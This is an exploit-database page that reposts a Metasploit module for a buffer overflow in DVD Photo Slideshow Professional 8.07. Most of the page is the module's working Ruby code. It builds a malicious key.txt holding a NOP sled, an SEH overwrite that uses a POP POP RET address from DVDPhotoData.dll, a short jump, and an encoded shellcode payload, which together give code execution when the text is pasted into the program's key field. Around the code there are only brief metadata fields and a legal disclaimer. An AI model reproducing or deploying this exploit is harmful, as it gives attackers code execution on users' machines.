DVD Photo Slideshow Professional 8.07 Key Buffer Overflow (Metasploit)
CVE
Category
Price
Severity
CWE-119
Not specified
High
Author
Risk
Exploitation Type
Date
Metasploit
High
Local
2020-10-15
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100089 Below is a copy:
DVD Photo Slideshow Professional 8.07 Key Buffer Overflow (Metasploit) ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info={})
super(update_info(info,
'Name' => "DVD Photo Slideshow Professional 8.07 Key Buffer Overflow",
'Description' => %q{
This module uses a buffer overflow in version 8.07 of DVD Photo Slideshow Professional By creating a specially designed TXT file copy the characters located in the
TXT file and paste the characters in the key field then validate the key the application suffers from a buffer overflow and overwrites EIP, allowing the shellcode to be executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'T3jv1l - ZwX', # Exploit-DB POC
'ZwX' # Metasploit Module
],
'References' =>
[
[ 'EDB', '48041 - 45346' ],
[ 'URL', 'https://www.exploit-db.com/exploits/48041' ],
[ 'URL', 'https://cxsecurity.com/issue/WLB-2018090084' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 10 x86 - Windows 7 x64',
{
'Ret' => 0x10014283 # POP POP RET [DVDPhotoData.dll]
}
]
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Privileged' => false,
'DisclosureDate' => "Feb 11 2020",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'Create malicious file key', 'key.txt'])
])
end
def exploit
file_payload = payload.encoded
msfsploit = make_fast_nops(1608)
msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
msfsploit << [target.ret].pack("V*") # SEH
msfsploit << file_payload
file_create(msfsploit)
end
end
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum